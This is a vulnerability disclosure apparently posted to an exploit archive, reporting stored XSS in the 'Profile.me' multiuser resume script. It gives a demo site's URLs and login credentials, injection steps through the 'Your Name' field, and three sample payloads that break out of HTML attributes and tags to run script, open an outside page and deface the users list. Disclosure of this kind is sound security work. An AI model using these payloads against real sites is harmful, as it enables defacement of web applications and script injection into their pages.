[*] :: Title: Profile.me - Multiuser profile & resume script Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-05
[*] :: Software: Profile.me - Multiuser profile & resume script
[?] :: Technical Details & Description:
# Weak security measures like bad input fields data filtering has been discovered in the «Profile.me - Multiuser profile & resume script» web-application.
[?] :: Demo Website:
# Frontend: http://profileme.pokkho.com
# Backend: http://profileme.pokkho.com/login
# Login/Password (user): quixss/asdasd
[!] :: Special Note:
# After a few injections you'll see that some blocks on the «Users» page are broken due to bad input fields data filtering.
# There are various mechanisms to secure application. These mechanisms are: ... & Cross-Site Scripting (XSS) Prevention © author
[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.
[+] :: PoC [Links]:
# http://profileme.pokkho.com/login (log in as quixss/asdasd)
# http://profileme.pokkho.com/admin/users (marquee)
[+] :: PoC [Stored XSS Injection]:
# Go to the demo website http://profileme.pokkho.com and register a new account (no validation required). Use the «Your Name» field for payload injection. Probably there is another vulnerable fields, but they are all disabled on the demo website.
# Sample payload #1: " autofocus onfocus="alert('QUIXSS');"/>
# Sample payload #2: " autofocus onfocus="alert('QUIXSS');window.open('https://twitter.com/quixss');"/><img src="https://i.imgur.com/zRm8R9z.gif">
# Sample payload #3: "></h3></tr></td></table></tr></td></table></div><marquee>QUIXSS